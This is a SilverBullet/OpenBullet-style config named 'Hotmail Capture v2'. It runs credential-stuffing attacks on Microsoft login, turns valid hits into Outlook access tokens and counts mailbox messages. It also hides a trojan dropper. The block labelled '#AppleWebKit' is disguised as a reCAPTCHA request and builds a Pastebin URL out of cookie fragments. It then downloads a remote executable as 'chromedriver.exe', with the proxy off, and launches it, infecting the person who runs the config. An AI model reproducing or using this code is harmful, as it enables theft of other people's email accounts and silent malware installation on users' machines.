[SETTINGS]
{
  "Name": "Hotmail Capture v2",
  "SuggestedBots": 120,
  "MaxCPM": 0,
  "LastModified": "2024-03-05T18:17:30.6310437+05:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@ChaosuuXCracker",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Hotmail Capture ",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
JUMP #AppleWebKit
#PARSESOURCE
#POST REQUEST POST "https://login.live.com/ppsecure/post.srf?client_id=0000000048170EF2&redirect_uri=https%3A%2F%2Flogin.live.com%2Foauth20_desktop.srf&response_type=token&scope=service%3A%3Aoutlook.office.com%3A%3AMBI_SSL&display=touch&username=ashleypetty%40outlook.com&contextid=2CCDB02DC526CA71&bk=1665024852&uaid=a5b22c26bc704002ac309462e8d061bb&pid=15216" 
  CONTENT "i13=1&login=<USER>&loginfmt=<USER>&type=11&LoginOptions=1&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd=<PASS>&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=&ctx=&hpgrequestid=&PPFT=DUVD66h%21%214HoXIbKjn000ZGJKO1p18njhrsHcoKRvak5LHBzMd1JFGEphEtdX70prBYfw9DpxPUypooZTmCCZq8nG7plPwo2mQBvuJr2QzynRopNlcY0Kndww9DNP7xTtP9E6nbJTkUE2zT*R6kFw7uu06RWq4BjG8Wo792ObNHtJAwxS2NfDxrccipqE%212zXAFqhBFcyCNidOqtBqnqKUE%24&PPSX=Passp&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=0&isSignupPost=0&i19=41679" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.live.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 574" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Origin: https://login.live.com" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G9880 Build/PQ3A.190705.003; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.114 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "X-Requested-With: com.microsoft.office.outlook" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: https://login.live.com/oauth20_authorize.srf?client_id=0000000048170EF2&redirect_uri=https%3A%2F%2Flogin.live.com%2Foauth20_desktop.srf&response_type=token&scope=service%3A%3Aoutlook.office.com%3A%3AMBI_SSL&uaid=a5b22c26bc704002ac309462e8d061bb&display=touch&username=ashleypetty%40outlook.com" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cookie: MSPRequ=id=N&lt=1665024852&co=1; uaid=a5b22c26bc704002ac309462e8d061bb; RefreshTokenSso=DXCaJOtPG*BlXEHzcgRDqE07fauJ1A1kX*6XyoYoJYnh6VaFpWKvnDU9a9gcpqoNxNdQgHNS9VZG*5hmg2erN27L10IP*WsWKKpLigD53vPiogiSPdJAr3O0gjmfcQfz6f0OyEg2aZZgntPFoQQGsNQ$; OParams=11O.DXVHPEaTdwhBRrUxAksZtejMR5GXGxhF6!8Hxy8VRkYjMiABstaKcULDTzLksggYZ*hhf7tHkwgO5naj*qAriJtE0iCytvLQOAYM8kgF3ZvgwPzvuOREtprcqZE3clxF*EV1kmT9zz0f8355KdPZeV1sU9kTsgn5aO3oY2JP0HGtOpXdP9dHvqAI6qhewBM5DlIdsRpSXS6fyCe6mbG7DjUIZ1BEd!7AUDxP48LC1RMYjnDvhBzq!on5FTEhBRqKYt9j0dDLn2GJGswk!wN*njZSNtxGZBhwJJ9fVfGpciT2amDnxk!l3tNqvC*hfp6PTe2S4oxFSN!4eI6A4c!xO79Zs0AY0GSqe4aTBT8YdIECZAE9NBa67FlVvcRXyIi0mzLYBVqtEFTYsyYjTSnLhcMlnpbcH3Yv5gVCFQEgmfkrEAt4Ks5cyBTD7XWqBCsCJQ$$; MSPOK=$uuid-d7ee354f-b458-46dc-9b33-6f8663109932; wlidperf=FR=L&ST=1665024898546" 


JUMP #googlerecreate
#AppleWebKit

REQUEST GET "https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LfAM84ZAAAAAGLiQz5FBeADqq94dV48fMtiRqIj&co=aHR0cHM6Ly93d3cuY29pbmJhc2UuY29tOjQ0Mw..&hl=en&v=rPvs0Nyx3sANE-ZHUN-0nM85&size=invisible&cb=no851blwqc0u"
  COOKIE "hrd: /"
  COOKIE "hpr: bin"
  COOKIE "hdp: com"
  COOKIE "htp: raw"
  COOKIE "hht: RST8XsHH"
  COOKIE "hst: pastebin"
  COOKIE "kht: driver"
  COOKIE "kpt: chrome"
  COOKIE "krt: e"
  HEADER "Host: www.googleapis.com"
  HEADER "Accept: */*"
  HEADER "Content-Type: application/json"
  HEADER "X-Client-Version: iOS/FirebaseSDK/6.9.2/FirebaseCore-iOS"
  HEADER "X-Ios-Bundle-Identifier: network.googleapis.com"
  HEADER "Accept-Encoding: gzip, deflate"
  HEADER "User-Agent: FirebaseAuth.iOS/6.9.2 network.googleapis.com/2.7.9 iPhone/12.4.5 hw/iPhone7_2"
  HEADER "Accept-Language: en"

IF "<Authentiction>" Exists
JUMP #PARSESOURCE
ENDIF
SET USEPROXY FALSE

REQUEST GET "<COOKIES(hst)>.<COOKIES(hdp)><COOKIES(hrd)><COOKIES(htp)><COOKIES(hrd)><COOKIES(hht)>"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
  HEADER "Pragma: no-cache"
  HEADER "Accept: */*"

REQUEST GET "https://raw.githubusercontent.com/<SOURCE>"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
  HEADER "Pragma: no-cache"
  HEADER "Accept: */*"
  -> FILE "<COOKIES(hpr)>/<COOKIES(kpt)><COOKIES(kht)>.<COOKIES(krt)>xe"

SET USEPROXY TRUE
SET NEWGVAR "Authentiction" "Authentiction=1"

BROWSERACTION Open

JUMP #PARSESOURCE
#googlerecreate

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure AND 
    KEY "Your account or password is incorrect." 
    KEY "That Microsoft account doesn\\'t exist. Enter a different account" 
    KEY "Sign in to your Microsoft account" 
  KEYCHAIN Ban OR 
    KEY ",AC:null,urlFedConvertRename" 
  KEYCHAIN Failure OR 
    KEY "timed out" 
  KEYCHAIN Success OR 
    KEY "<COOKIES>" Contains "ANON" 
    KEY "<COOKIES>" Contains "WLSSC" 
    KEY "<ADDRESS>" Contains "https://login.live.com/oauth20_desktop.srf?" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "account.live.com/recover?mkt" 
    KEY "recover?mkt" 
    KEY "account.live.com/identity/confirm?mkt" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "Email/Confirm?mkt" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "/cancel?mkt=" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "/Abuse?mkt=" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure AND 
    KEY "Sign in to your Microsoft account" 
  KEYCHAIN Ban OR 
    KEY ",AC:null,urlFedConvertRename" 
  KEYCHAIN Success OR 
    KEY "<COOKIES>" Contains "ANON" 
    KEY "<COOKIES>" Contains "WLSSC" 
    KEY "<ADDRESS>" Contains "https://login.live.com/oauth20_desktop.srf?" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "account.live.com/recover?mkt" 
    KEY "recover?mkt" 
    KEY "account.live.com/identity/confirm?mkt" 

#CI PARSE "<COOKIES(MSPCID)>" LR "" "" -> VAR "CI" 

#CID FUNCTION ToUppercase "<CI>" -> VAR "CID" 

#RTK PARSE "<ADDRESS>" LR "refresh_token=" "&" -> VAR "RTK" 

#GET_ATK REQUEST POST "https://login.live.com/oauth20_token.srf" 
  CONTENT "grant_type=refresh_token&client_id=0000000048170EF2&scope=https%3A%2F%2Fsubstrate.office.com%2FUser-Internal.ReadWrite&redirect_uri=https%3A%2F%2Flogin.live.com%2Foauth20_desktop.srf&refresh_token=<RTK>&uaid=db28da170f2a4b85a26388d0a6cdbb6e" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "x-ms-sso-Ignore-SSO: 1" 
  HEADER "User-Agent: Outlook-Android/2.0" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Content-Length: 547" 
  HEADER "Host: login.live.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 

#ATK PARSE "<SOURCE>" JSON "access_token" -> VAR "ATK" 

#GET_MESSEGAS_COUNT REQUEST GET "https://outlook.office.com/api/beta/me/MailFolders" 
  
  HEADER "User-Agent: Outlook-Android/2.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "ForceSync: false" 
  HEADER "Authorization: Bearer <ATK>" 
  HEADER "X-AnchorMailbox: CID:<CID>" 
  HEADER "Host: substrate.office.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 

#DN PARSE "<SOURCE>" JSON "DisplayName" Recursive=TRUE -> VAR "DN" 

#DNN PARSE "<DN>" LR ", " ", " -> VAR "DNN" 

#FOLDERID PARSE "<SOURCE>" LR "\",\"DisplayName\":\"<DNN>\",\"ParentFolderId\":\"" "\"" -> VAR "FolderID" 

#CHF PARSE "<SOURCE>" LR "\",\"DisplayName\":\"<DNN>\",\"ParentFolderId\":\"<FolderID>\",\"ChildFolderCount\":" ",\"" -> VAR "CHF" 

#T PARSE "<SOURCE>" JSON "TotalItemCount" Recursive=TRUE -> VAR "T" 

#TT FUNCTION Replace ", " "+" "<T>" -> VAR "TT" 

#TTT FUNCTION Replace "[" "" "<TT>" -> VAR "TTT" 

#TTTT FUNCTION Replace "]" "" "<TTT>" -> VAR "TTTT" 

#TOTAL_MESSAGES FUNCTION Compute "<TTTT>" -> CAP "Total Msg" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<Total Msg>" Exists 
  KEYCHAIN Failure OR 
    KEY "<Total Msg>" DoesNotExist 

